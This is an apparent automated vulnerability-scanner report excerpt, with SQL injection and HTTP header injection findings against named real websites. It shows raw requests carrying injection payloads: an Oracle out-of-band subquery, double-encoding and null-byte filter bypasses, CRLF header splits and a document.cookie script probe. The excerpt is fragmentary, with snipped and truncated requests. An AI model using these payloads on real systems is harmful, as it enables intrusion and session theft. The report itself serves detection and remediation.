...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true'; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Response 1 (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:58 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
Request 2
GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true''; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Response 2 (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]...
1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: https://www.supermedia.com
Path: /spportal/spportalFlow.do
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1'=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 1
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20261
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... e next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque ...[SNIP]...
Request 2
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1''=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 2
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19960
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527; undefined_s=First%20Visit
Response 1 (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21158
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Request 2
GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
The hl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /?hl=en%00'&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Request 2
GET /?hl=en%00''&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.youtube.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /?1''=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The OAVARS[aed03704] cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the OAVARS[aed03704] cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the OAVARS[aed03704] cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... our system with the leading and award-winning Registry Booster 2011 from Uniblue. Registry Booster 2011 is the safest and most trusted solution to clean and optimize your system, free it from registry errors and fragmented entries. Through Advanced Error Detection Technology, Registry Booster 2011 automatically identifies missing, corrupt, or invalid items in your Windows registry and dramatically enhances performance and general stability </p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /delivery/afr.php?n=aed03704'&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... <p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.
<p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704''&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /delivery/afr.php?n=aed03704%00'&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... <p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.
<p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704%00''&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://102.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6
d29cc9616d1=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e
d4b2f64cb5a
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.
Request
GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F